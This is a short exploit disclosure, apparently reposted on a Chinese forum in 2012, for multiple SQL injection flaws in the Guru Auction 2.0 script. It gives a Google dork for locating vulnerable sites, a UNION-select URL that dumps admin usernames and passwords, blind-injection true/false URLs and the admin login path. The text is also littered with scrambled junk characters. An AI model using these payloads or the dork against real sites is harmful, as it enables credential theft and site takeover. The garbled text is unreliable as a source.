Guru Auction 2.0 Multiple SQL Injection Vulnerabilities( w( X& L; y R
! m2 v' g6 U$ V' f# s/ S作者 : v3n0m' H: h d. M; G- i A5 y* ]
应用 : Guru Auction 2.0
* c' Z' G5 F& v0 z9 S# OPrice : $49) w. R' {- T8 s9 H* T* }
Vendor : http://www.guruscript.com/1 [2 N. y# c/ W: U3 {& T
Google Dork : inurl:subcat.php?cate_id=
# E7 C& o/ L! n* J5 a: I ' Z1 G1 ]* n% k9 G8 [
SQLi p0c:
2 }; ?$ U& A# b0 p~~~~~~~~~~8 C+ t4 d0 f: l& X/ F! Q3 i
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--# t! y3 ^' }1 D& b9 J; j
+ r( E4 [7 ?% V7 @
' [; E. ^9 C/ B! [1 b; }5 D盲注 p0c: n' ]; D2 J" A
~~~~~~~~~~
8 S0 l8 C8 |) c9 r7 j0 z8 |1 yhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
( U; {8 l0 ]- P8 `' M7 g' ]http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
$ k; p! \- K9 D# k6 F" S W- y0 R3 p6 n, z' i
管理登录入口:( Q, o( g1 A" Q0 X: h% J
~~~~~~~~~~: V) k( e! X4 |3 y7 d& C5 H
http://domain.tld/[path]/admin/
8 O, \2 R- t3 K) L7 h7 l4 { |
发表于 2012-12-31 09:24:05
收藏
支持
反对